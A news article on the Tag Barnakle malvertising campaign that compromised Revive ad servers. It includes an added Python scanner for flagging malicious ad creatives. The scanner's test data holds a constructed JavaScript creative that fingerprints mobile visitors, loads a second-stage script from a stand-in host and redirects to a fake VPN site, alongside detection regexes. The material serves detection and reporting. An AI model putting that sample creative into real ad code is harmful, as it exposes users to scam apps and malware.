September 26, 2023

A malvertising campaign tracked as “Tag Barnakle” has been behind the breach of more than 120 ad servers over the past year, sneakily injecting code in an attempt to serve malicious advertisements that redirect users to rogue websites and so expose victims to scamware or malware.

Where other operators infiltrate the ad-tech ecosystem using “convincing personas” to buy space on legitimate websites for running the malicious ads, Tag Barnakle is “able to bypass this initial hurdle completely by going straight for the jugular — mass compromise of ad serving infrastructure.”

Having earlier poisoned nearly 60-70 ad servers, the group's latest slew of attacks is no different, although the adversaries appear to have upgraded their tools to target mobile devices as well: Tag Barnakle is now pushing mobile-targeted campaigns.

Ads served through a hacked server carry out client-side fingerprinting and, when certain checks are satisfied, deliver a second-stage JavaScript payload (click-tracker ads) that redirects users to malicious websites. The aim is to lure visitors to an app store listing for fake security, safety, or VPN apps, which come with hidden subscription costs or hijack the traffic for other nefarious purposes.
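The chain described above (fingerprint the client, load a second stage only when checks pass, then redirect) is what a defender reviewing creatives served by an ad server would want to flag. The following is an added example, not Confiant's tooling or anything published by the campaign's investigators: a small static heuristic scanner that looks for those three indicator families in JavaScript creatives and flags a creative only when several families co-occur. The two sample creatives, the indicator regexes and all URLs are constructed for illustration.

```python
import re
from dataclasses import dataclass, field

# Heuristic indicator families (constructed for this example). A creative
# that matches patterns from several different families at once resembles
# the fingerprint -> second-stage -> redirect chain and is worth a review.
INDICATORS = {
    "fingerprint": [
        r"navigator\.(userAgent|platform|plugins|webdriver|language)",
        r"screen\.(width|height|availWidth)",
        r"window\.(orientation|devicePixelRatio)",
        # JS regex literal testing the UA for mobile strings, e.g. /Android|iPhone/i.test(ua)
        r"/[^/\n]*(Android|iPhone|iPad|Mobile)[^/\n]*/i?\s*\.test\(",
    ],
    "second_stage": [
        r"document\.createElement\(\s*['\"]script['\"]\s*\)",
        r"\.src\s*=\s*[^;]*\+",          # a script/image src assembled at run time
        r"\beval\s*\(",
        r"new\s+Function\s*\(",
    ],
    "redirect": [
        # assignment to location (not a comparison), optionally via window/top/parent
        r"\b(?:window\.|top\.|parent\.)?location(?:\.href)?\s*=(?!=)",
        r"location\.(replace|assign)\s*\(",
    ],
}


@dataclass
class ScanResult:
    name: str
    hits: dict = field(default_factory=dict)   # family -> list of matched snippets

    @property
    def families(self):
        return sorted(self.hits)

    @property
    def suspicious(self):
        # Two or more families keeps a plain "banner plus landing-page link"
        # creative clean while catching the conditional-redirect pattern.
        return len(self.hits) >= 2


def scan_creative(name: str, js_source: str) -> ScanResult:
    """Run every indicator regex over one creative and collect the matches per family."""
    result = ScanResult(name)
    for family, patterns in INDICATORS.items():
        for pat in patterns:
            for m in re.finditer(pat, js_source):
                result.hits.setdefault(family, []).append(m.group(0))
    return result


def triage(creatives: dict) -> list:
    """Return the names of creatives whose indicator families overlap enough to warrant review."""
    return [name for name, src in creatives.items() if scan_creative(name, src).suspicious]


# Constructed sample creatives; neither is a real payload from the campaign.
BENIGN_CREATIVE = """
var img = document.createElement('img');
img.src = 'https://cdn.example.invalid/banner-300x250.png';
img.addEventListener('click', function () {
  window.open('https://advertiser.example.invalid/landing', '_blank');
});
document.getElementById('ad-slot').appendChild(img);
"""

SUSPICIOUS_CREATIVE = """
var ua = navigator.userAgent;
if (/Android|iPhone|iPad/i.test(ua) && screen.width < 800 && !navigator.webdriver) {
  var s = document.createElement('script');
  s.src = 'https://second-stage.example.invalid/t.js?w=' + screen.width;   // second-stage loader
  document.head.appendChild(s);
  setTimeout(function () { top.location = 'https://fake-vpn-app.example.invalid/'; }, 1500);
}
"""

if __name__ == "__main__":
    samples = {"benign": BENIGN_CREATIVE, "suspect": SUSPICIOUS_CREATIVE}
    for name, src in samples.items():
        r = scan_creative(name, src)
        print(f"{name}: families={r.families} suspicious={r.suspicious}")
    print("flag for review:", triage(samples))
```

Run against a dump of the creatives an ad server is actually delivering, the scanner gives a short review list rather than a verdict; obfuscated second stages will need a dynamic (headless-browser) check, since regexes only see what is in the served text.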

Given that the Revive ad server software is used by a good number of ad platforms and media companies, Confiant pegs the reach of Tag Barnakle in the range of “tens if not hundreds of millions of devices,” a conservative estimate.

